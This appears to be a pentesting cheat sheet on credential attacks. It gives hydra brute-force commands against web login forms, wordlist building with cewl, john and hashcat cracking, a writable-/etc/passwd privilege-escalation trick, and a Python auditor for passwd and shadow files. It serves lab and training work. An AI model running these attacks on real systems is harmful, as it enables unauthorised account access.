A username list can be generated with username-anarchy from a file of real names, using several naming formats:
{% code overflow="wrap" %}
ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first
{% endcode %}
When a website login needs to be brute-forced, use cewl to build a wordlist from the site's content (minimum word length 5 here):
{% code overflow="wrap" %}
cewl http://postfish.off/team.html -m 5 -w team.txt
{% endcode %}
Then use it with hydra.
Normal:
{% code overflow="wrap" %}
hydra -l user -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
{% endcode %}
Here `Login failed. Invalid` is the string hydra looks for in the response to know the login was not successful, `fm_usr` is the username parameter and `fm_pwd` is the password parameter (`^PASS^` is replaced with each candidate from the wordlist).
Base64:
{% code overflow="wrap" %}
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^'
{% endcode %}
`^USER64^` and `^PASS64^` send the candidates base64-encoded; `-I` skips the restore-file prompt and `-f` stops after the first valid pair.
To crack a hash with john:
{% code title="--wordlist to specify wordlist" %}
john --format=sha256 hashes_to_crack.txt
{% endcode %}
| Tool | Description |
|---|---|
| pdf2john | Converts PDF documents for John |
| ssh2john | Converts SSH private keys for John |
| mscash2john | Converts MS Cash hashes for John |
| keychain2john | Converts OS X keychain files for John |
| rar2john | Converts RAR archives for John |
| pfx2john | Converts PKCS#12 files for John |
| truecrypt_volume2john | Converts TrueCrypt volumes for John |
| keepass2john | Converts KeePass databases for John |
| vncpcap2john | Converts VNC PCAP files for John |
| putty2john | Converts PuTTY private keys for John |
| zip2john | Converts ZIP archives for John |
| hccap2john | Converts WPA/WPA2 handshake captures for John |
| office2john | Converts MS Office documents for John |
| wpa2john | Converts WPA/WPA2 handshakes for John |
To mutate passwords with a hashcat rule file:
{% code overflow="wrap" %}
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
{% endcode %}
If the /etc/passwd file is writable, delete the "x" in an account's password field: the account then has no password and the hash in /etc/shadow is ignored.
Algorithm Types (crypt hash prefixes)
- $1$ – MD5
- $2a$ – Blowfish
- $2y$ – Eksblowfish
- $5$ – SHA-256
- $6$ – SHA-512
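As an added defender-side example (not from the original page), the following Python audits /etc/passwd-style lines for the missing-"x" condition described above and labels /etc/shadow-style entries with the algorithm from the prefix table; the sample file contents are constructed.

```python
import re

# crypt(3) prefixes and the algorithms they denote, as listed on the page.
CRYPT_PREFIXES = {
    "$1$": "MD5",
    "$2a$": "Blowfish",
    "$2y$": "Eksblowfish",
    "$5$": "SHA-256",
    "$6$": "SHA-512",
}

# Constructed sample data: "svc" has had the "x" removed from its password field.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc::1001:1001::/home/svc:/bin/bash
"""
SAMPLE_SHADOW = """root:$6$saltsalt$FAKEHASHFAKEHASH:19000:0:99999:7:::
backup:*:19000:0:99999:7:::
legacy:$1$abcdefgh$FAKEHASH:19000:0:99999:7:::
www:$2y$10$FAKE/FAKE:19000:0:99999:7:::
"""

def audit_passwd(passwd_text):
    """Return (account, finding) pairs for passwd entries whose password field is not 'x'.
    An empty field means login without any password; any other value means a hash
    is stored in passwd itself instead of shadow."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
        elif fields[1] == "":
            findings.append((fields[0], "empty password field"))
        elif fields[1] not in ("x", "*", "!"):
            findings.append((fields[0], "hash stored in passwd"))
    return findings

def shadow_algorithms(shadow_text):
    """Map each shadow account to its hash algorithm, derived from the $id$ prefix."""
    result = {}
    for line in shadow_text.splitlines():
        if not line:
            continue
        name, hash_field = line.split(":")[:2]
        if hash_field == "":
            result[name] = "no password"
        elif hash_field.startswith(("!", "*")):
            result[name] = "locked"
        else:
            m = re.match(r"(\$[^$]+\$)", hash_field)  # e.g. "$6$" from "$6$salt$hash"
            result[name] = CRYPT_PREFIXES.get(m.group(1) if m else None, "unknown")
    return result
```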